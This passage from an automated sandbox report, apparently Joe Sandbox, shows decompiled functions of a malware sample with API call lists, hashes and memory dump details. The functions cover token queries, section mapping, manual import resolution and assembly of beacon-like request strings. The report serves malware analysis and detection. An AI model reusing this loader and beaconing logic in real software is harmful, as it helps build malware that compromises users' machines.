						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                  0x00ec83c4
                                                  0x00ec83c5
                                                  0x00ec83c6
                                                  0x00ec83c7
                                                  0x00ec83c8
                                                  0x00ec83cc
                                                  0x00ec83d3
                                                  0x00ec83e2
                                                  0x00ec83e5
                                                  0x00ec83e8
                                                  0x00ec83ef
                                                  0x00ec83f2
                                                  0x00ec83f5
                                                  0x00ec83f8
                                                  0x00ec83fb
                                                  0x00ec8406
                                                  0x00ec8408
                                                  0x00ec8411
                                                  0x00ec8419
                                                  0x00ec841b
                                                  0x00ec842d
                                                  0x00ec8437
                                                  0x00ec843b
                                                  0x00ec844a
                                                  0x00ec844e
                                                  0x00ec8457
                                                  0x00ec845f
                                                  0x00ec845f
                                                  0x00ec8461
                                                  0x00ec8461
                                                  0x00ec8469
                                                  0x00ec846f
                                                  0x00ec8473
                                                  0x00ec8473
                                                  0x00ec847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00EC83FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00EC8411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00EC842D
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00EC844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00EC8457
                                                  • NtClose.NTDLL(?), ref: 00EC8469
                                                  • NtClose.NTDLL(00000000), ref: 00EC8473
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 7d22cd59952c87fd8f965b73cd38b86651b895e306c8930264e50d15ab1786ab
                                                  • Instruction ID: 67394f7f6d9c237824b85a632b77d219c34e71807007dff61909a45575634abd
                                                  • Opcode Fuzzy Hash: 7d22cd59952c87fd8f965b73cd38b86651b895e306c8930264e50d15ab1786ab
                                                  • Instruction Fuzzy Hash: AA21D2B2900219BFDB119F96CE85EDEBFBDEB08750F104026F914F6121D7729A469BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401EB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E00401EB5(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401D9F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                  0x00401ebe
                                                  0x00401ec5
                                                  0x00401ec6
                                                  0x00401ec7
                                                  0x00401ec8
                                                  0x00401ec9
                                                  0x00401eda
                                                  0x00401ede
                                                  0x00401ef2
                                                  0x00401ef5
                                                  0x00401ef8
                                                  0x00401eff
                                                  0x00401f02
                                                  0x00401f09
                                                  0x00401f0c
                                                  0x00401f0f
                                                  0x00401f12
                                                  0x00401f17
                                                  0x00401f52
                                                  0x00401f19
                                                  0x00401f1c
                                                  0x00401f22
                                                  0x00401f27
                                                  0x00401f2b
                                                  0x00401f49
                                                  0x00401f2d
                                                  0x00401f34
                                                  0x00401f42
                                                  0x00401f42
                                                  0x00401f2b
                                                  0x00401f5a

                                                  APIs
                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401F12
                                                    • Part of subcall function 00401D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                  • memset.NTDLL ref: 00401F34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Section$CreateViewmemset
                                                  • String ID: @
                                                  • API String ID: 2533685722-2766056989
                                                  • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction ID: 68d8c8f26fc330075f7cb601c6588f33ac635daa3c13fb39122687157e3906a1
                                                  • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction Fuzzy Hash: 92211DB1D00209AFDB11DFA9C8849EEFBB9FF48354F10447AE606F3250D734AA498B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401745, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401745(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x40414c;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                  0x00401745
                                                  0x0040174e
                                                  0x00401753
                                                  0x00401759
                                                  0x00401762
                                                  0x00401768
                                                  0x0040176a
                                                  0x0040176d
                                                  0x00401772
                                                  0x00401779
                                                  0x00401779
                                                  0x0040177d
                                                  0x00401785
                                                  0x00401788
                                                  0x00000000
                                                  0x00000000
                                                  0x0040178e
                                                  0x00401798
                                                  0x0040179a
                                                  0x0040179d
                                                  0x004017a0
                                                  0x004017a4
                                                  0x004017ac
                                                  0x004017ae
                                                  0x004017b1
                                                  0x00401819
                                                  0x00401819
                                                  0x0040181d
                                                  0x00000000
                                                  0x00000000
                                                  0x004017b6
                                                  0x004017bc
                                                  0x004017be
                                                  0x004017d1
                                                  0x004017d4
                                                  0x004017d4
                                                  0x004017d4
                                                  0x004017d8
                                                  0x004017c0
                                                  0x004017c0
                                                  0x004017c8
                                                  0x004017ca
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004017ca
                                                  0x004017b8
                                                  0x004017b8
                                                  0x004017cc
                                                  0x004017cc
                                                  0x004017cc
                                                  0x004017db
                                                  0x004017de
                                                  0x004017e0
                                                  0x004017e7
                                                  0x004017e2
                                                  0x004017e2
                                                  0x004017e2
                                                  0x004017ef
                                                  0x004017f5
                                                  0x004017f7
                                                  0x00401827
                                                  0x004017f9
                                                  0x004017f9
                                                  0x004017fc
                                                  0x004017fe
                                                  0x00401806
                                                  0x00401806
                                                  0x0040180b
                                                  0x0040180d
                                                  0x00401814
                                                  0x00401816
                                                  0x00401816
                                                  0x00401816
                                                  0x00000000
                                                  0x00401816
                                                  0x00000000
                                                  0x004017f7
                                                  0x004017a6
                                                  0x004017a8
                                                  0x004017aa
                                                  0x00000000
                                                  0x00000000
                                                  0x004017aa
                                                  0x0040182a
                                                  0x0040182a
                                                  0x00401831
                                                  0x00401836
                                                  0x00000000
                                                  0x00000000
                                                  0x0040183c
                                                  0x00401847
                                                  0x00000000
                                                  0x00401847
                                                  0x0040183e
                                                  0x0040183e
                                                  0x00401844
                                                  0x00000000
                                                  0x00401844
                                                  0x00401772
                                                  0x00401848
                                                  0x0040184d

                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004017EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID:
                                                  • API String ID: 2574300362-0
                                                  • Opcode ID: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                  • Instruction ID: 20e41381af83e98fed74a613c3f7ab7ed5ea214225131684d0572623078a26fe
                                                  • Opcode Fuzzy Hash: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                  • Instruction Fuzzy Hash: A2310C76A0020A9FDB15CF59C980AAEB7F4BF45315F24807AD805F73A0E778DA41DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401D9F, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00401D9F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                  0x00401db1
                                                  0x00401db7
                                                  0x00401dc5
                                                  0x00401dcc
                                                  0x00401dd1
                                                  0x00401dd7
                                                  0x00000000
                                                  0x00401dd8
                                                  0x00000000

                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction ID: d47de4e0d58a28ad62aca0fe1954c9537e19fd45f2cb1026219e244723f4612c
                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction Fuzzy Hash: 79F012B590020CBFDB119FA5CC85C9FBBBDEB44358F10497AB152E10A0D630AE089A60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC8B94, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 245memorystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00EC8B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xecd018; // 0xf56cfa1f
				asm("bswap eax");
				_t61 =  *0xecd014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0xecd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xecd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0xecd27c; // 0x213a5a8
				_t3 = _t64 + 0xece633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0xecd02c,  *0xecd004, _t59);
				_t67 = E00EC1C1A();
				_t68 =  *0xecd27c; // 0x213a5a8
				_t4 = _t68 + 0xece673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E00EC54BC(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0xecd27c; // 0x213a5a8
					_t7 = _t127 + 0xece8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0xecd238, 0, _v8);
				}
				_t73 = E00EC7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0xecd27c; // 0x213a5a8
					_t11 = _t122 + 0xece8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0xecd238, 0, _v8);
				}
				_t147 =  *0xecd32c; // 0x30095b0
				_t75 = E00EC9395(0xecd00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0xecd238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xecd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xecd238, _t153, _v20);
						goto L26;
					}
					E00EC7A80(GetTickCount());
					_t82 =  *0xecd32c; // 0x30095b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xecd32c; // 0x30095b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xecd32c; // 0x30095b0
					_t149 = E00EC8307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0xecd238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0xecc2ac);
					_push(_t149);
					_t94 = E00EC3CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xecd238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E00EC809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E00ECA1B0();
						L22:
						HeapFree( *0xecd238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E00EC43DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E00EC163F(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E00EC9039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E00EC85DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00EC9039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                  0x00ec8b94
                                                  0x00ec8b94
                                                  0x00ec8b94
                                                  0x00ec8b9f
                                                  0x00ec8ba6
                                                  0x00ec8ba8
                                                  0x00ec8ba8
                                                  0x00ec8bb5
                                                  0x00ec8bc0
                                                  0x00ec8bc3
                                                  0x00ec8bc8
                                                  0x00ec8bd1
                                                  0x00ec8bd4
                                                  0x00ec8bd9
                                                  0x00ec8bdc
                                                  0x00ec8be1
                                                  0x00ec8be4
                                                  0x00ec8bf0
                                                  0x00ec8bfd
                                                  0x00ec8bff
                                                  0x00ec8c05
                                                  0x00ec8c0a
                                                  0x00ec8c15
                                                  0x00ec8c17
                                                  0x00ec8c1a
                                                  0x00ec8c1c
                                                  0x00ec8c23
                                                  0x00ec8c29
                                                  0x00ec8c2c
                                                  0x00ec8c2f
                                                  0x00ec8c34
                                                  0x00ec8c41
                                                  0x00ec8c43
                                                  0x00ec8c49
                                                  0x00ec8c53
                                                  0x00ec8c53
                                                  0x00ec8c55
                                                  0x00ec8c5c
                                                  0x00ec8c5f
                                                  0x00ec8c62
                                                  0x00ec8c67
                                                  0x00ec8c74
                                                  0x00ec8c76
                                                  0x00ec8c84
                                                  0x00ec8c84
                                                  0x00ec8c86
                                                  0x00ec8c94
                                                  0x00ec8c99
                                                  0x00ec8c9d
                                                  0x00ec8ca0
                                                  0x00ec8e63
                                                  0x00ec8e6d
                                                  0x00ec8e76
                                                  0x00ec8ca6
                                                  0x00ec8cb2
                                                  0x00ec8cba
                                                  0x00ec8cbd
                                                  0x00ec8e57
                                                  0x00ec8e61
                                                  0x00000000
                                                  0x00ec8e61
                                                  0x00ec8cc9
                                                  0x00ec8cce
                                                  0x00ec8cd7
                                                  0x00ec8ce8
                                                  0x00ec8cec
                                                  0x00ec8cf5
                                                  0x00ec8cfb
                                                  0x00ec8d0a
                                                  0x00ec8d11
                                                  0x00ec8d1a
                                                  0x00ec8d20
                                                  0x00ec8e4b
                                                  0x00ec8e55
                                                  0x00000000
                                                  0x00ec8e55
                                                  0x00ec8d2c
                                                  0x00ec8d32
                                                  0x00ec8d33
                                                  0x00ec8d3a
                                                  0x00ec8d3d
                                                  0x00ec8e41
                                                  0x00ec8e49
                                                  0x00000000
                                                  0x00ec8e49
                                                  0x00ec8d46
                                                  0x00ec8d4d
                                                  0x00ec8d55
                                                  0x00ec8d5a
                                                  0x00ec8d63
                                                  0x00ec8d69
                                                  0x00ec8d70
                                                  0x00ec8d77
                                                  0x00ec8d7a
                                                  0x00ec8e79
                                                  0x00ec8e2d
                                                  0x00ec8e2d
                                                  0x00ec8e32
                                                  0x00ec8e3d
                                                  0x00ec8e3f
                                                  0x00000000
                                                  0x00ec8e3f
                                                  0x00ec8d84
                                                  0x00ec8d8b
                                                  0x00ec8d8e
                                                  0x00ec8d93
                                                  0x00ec8d9e
                                                  0x00ec8da3
                                                  0x00ec8da6
                                                  0x00ec8dac
                                                  0x00ec8db2
                                                  0x00ec8db8
                                                  0x00ec8dbb
                                                  0x00ec8dc1
                                                  0x00ec8dc4
                                                  0x00ec8dc9
                                                  0x00ec8dcd
                                                  0x00ec8dcd
                                                  0x00ec8dd9
                                                  0x00ec8de5
                                                  0x00ec8de9
                                                  0x00ec8deb
                                                  0x00ec8df0
                                                  0x00ec8df2
                                                  0x00ec8df7
                                                  0x00ec8dfc
                                                  0x00ec8e09
                                                  0x00ec8e11
                                                  0x00ec8e14
                                                  0x00ec8e14
                                                  0x00ec8df0
                                                  0x00000000
                                                  0x00ec8ddb
                                                  0x00ec8ddf
                                                  0x00ec8e16
                                                  0x00ec8e19
                                                  0x00ec8e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec8e22
                                                  0x00ec8de1
                                                  0x00000000
                                                  0x00ec8de1
                                                  0x00ec8dd9

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00EC8BA8
                                                  • wsprintfA.USER32 ref: 00EC8BF8
                                                  • wsprintfA.USER32 ref: 00EC8C15
                                                  • wsprintfA.USER32 ref: 00EC8C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC8C53
                                                  • wsprintfA.USER32 ref: 00EC8C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC8C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00EC8CB2
                                                  • GetTickCount.KERNEL32 ref: 00EC8CC3
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00EC8CD7
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00EC8CF5
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?,030095B0), ref: 00EC8332
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(?,?,?,00ECA428,?,030095B0), ref: 00EC833A
                                                    • Part of subcall function 00EC8307: strcpy.NTDLL ref: 00EC8351
                                                    • Part of subcall function 00EC8307: lstrcat.KERNEL32(00000000,?), ref: 00EC835C
                                                    • Part of subcall function 00EC8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC8379
                                                  • StrTrimA.SHLWAPI(00000000,00ECC2AC,?,030095B0), ref: 00EC8D2C
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(030087FA,00000000,00000000,74ECC740,00ECA453,00000000), ref: 00EC3CD8
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(?), ref: 00EC3CE0
                                                    • Part of subcall function 00EC3CC8: lstrcpy.KERNEL32(00000000,030087FA), ref: 00EC3CF4
                                                    • Part of subcall function 00EC3CC8: lstrcat.KERNEL32(00000000,?), ref: 00EC3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00EC8D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 00EC8D55
                                                  • lstrcat.KERNEL32(?,?), ref: 00EC8D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00EC8D69
                                                    • Part of subcall function 00EC809F: lstrlen.KERNEL32(?,00000000,00ECD330,00000001,00EC2200,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#), ref: 00EC80A8
                                                    • Part of subcall function 00EC809F: mbstowcs.NTDLL ref: 00EC80CF
                                                    • Part of subcall function 00EC809F: memset.NTDLL ref: 00EC80E1
                                                  • wcstombs.NTDLL ref: 00EC8DFC
                                                    • Part of subcall function 00EC163F: SysAllocString.OLEAUT32(?), ref: 00EC1680
                                                    • Part of subcall function 00EC163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00EC1702
                                                    • Part of subcall function 00EC163F: StrStrIW.SHLWAPI(?,006E0069), ref: 00EC1741
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 00EC8E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00EC8E49
                                                  • HeapFree.KERNEL32(00000000,?,?,030095B0), ref: 00EC8E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC8E61
                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 00EC8E6D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                  • String ID: _h
                                                  • API String ID: 603507560-4139817520
                                                  • Opcode ID: 14380d448949f17d32434be0277f8cd539bd50e2b0f47cc02addc1a37a0f0e23
                                                  • Instruction ID: 0b20c29efb8069e2e8362321088420be043a680b010722894bc87860d4d88e76
                                                  • Opcode Fuzzy Hash: 14380d448949f17d32434be0277f8cd539bd50e2b0f47cc02addc1a37a0f0e23
                                                  • Instruction Fuzzy Hash: BF913971900208AFCB119FA9DE45E9ABBB9EF48314F144069F408F7261CB33D956DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
